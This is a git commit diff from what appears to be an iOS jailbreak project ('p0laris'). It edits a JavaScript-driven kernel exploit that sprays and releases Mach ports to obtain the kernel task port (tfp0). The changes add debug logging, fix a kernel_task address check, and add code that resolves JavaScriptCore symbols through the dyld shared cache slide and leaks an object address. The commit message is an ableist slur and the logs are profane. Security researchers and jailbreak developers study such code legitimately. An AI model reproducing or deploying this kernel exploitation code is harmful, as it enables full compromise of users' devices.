fucking retard

3 files changed, 32 insertions, 3 deletions

diff --git a/.gitignore b/.gitignore
index 6956cbd..4e09967 100644
--- a/.gitignore
+++ b/.gitignore
@@ -18,4 +18,6 @@ racoon.conf
 .vscode

 

 exp_unmin.js

-stage4.js
\ No newline at end of file
+stage4.js

+

+.irecovery
\ No newline at end of file
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index aa10126..19d2623 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -289,13 +289,19 @@ function send_ports(target, payload, num, number_port_descs) {
 
 function release_port_ptrs(port) {
 //	var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
+	p0laris_log("fuck");
 	var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
-//	p0laris_log("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
+	p0laris_log("fuck");
+	//	p0laris_log("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
 	var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+	p0laris_log("fuck");
 	if (ret != KERN_SUCCESS) {
 		p0laris_log("mach_recv %d %s\n", ret, mach_error_string(ret));
+		p0laris_log("fuck2");
 	}
+	p0laris_log("fuck");
 	shit_heap_free(req);
+	p0laris_log("fuck");
 }
 
 function r3gister(task, init_port_set, real_count, fake_count) {
@@ -463,6 +469,9 @@ again: while (true) {
 	sched_yield();
 	for (var i = 0; i < PORTS_NUM; i++) {
 //	for (var i = 0; i < 8; i++) {
+		if (i % 4 == 0) {
+			p0laris_log("release_port_ptrs %d\n", i);
+		}
 		release_port_ptrs(read_u32(fp + (i << 2)));
 	}
 
@@ -544,7 +553,7 @@ again: while (true) {
 	p0laris_log("IF YOU SEE THIS AND IT LOOKS LEGIT, SHIT HAS FUCKING HAPPENED\n");
 	p0laris_log("fuck\n");
 	call4arg(sym_cache["puts"], sptr("kernel_task address: 0x" + pad_left(read_u32(kernel_task_addr).toString(16), '0', 8)), 0, 0, 0);
-	if (kernel_task_addr === 0xffffffff) {
+	if (read_u32(kernel_task_addr) === 0xffffffff) {
 		continue again;
 	}
 	p0laris_log("kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
@@ -552,6 +561,10 @@ again: while (true) {
 
 	p0laris_log("get lucky\n");
 
+	while (true) {
+		sleep(3600);
+	}
+
 	return tfp0;
 	}
 }
diff --git a/src/stage4/main.js b/src/stage4/main.js
index 53a74ec..af2ed69 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -12,6 +12,13 @@ var SOCK_DGRAM = 2;
 var SOCK_DGRAM = 2;
 var IPPROTO_UDP = 17;
 
+function prep_shit() {
+	string_ref = scall("JSStringCreateWithUTF8CString", "victim");
+	global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
+	jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
+	large_buf_ptr = leak_vec(large_buf);
+}
+
 function main() {
 	syslog(LOG_SYSLOG, "__p0laris_LOG_START__");
 	p0laris_log("[*] we out here");
@@ -24,6 +31,13 @@ function main() {
 
 	printf("test");
 
+	var dyld_shc_slide = get_dyld_shc_slide();
+
+	sym_cache["JSStringCreateWithUTF8CString"] = JSStringCreateWithUTF8CString + dyld_shc_slide;
+	sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide;
+	sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
+	prep_shit();
+
 	var tfp0 = get_kernel_task();
 
 	syslog(LOG_SYSLOG, "__p0laris_LOG_END__");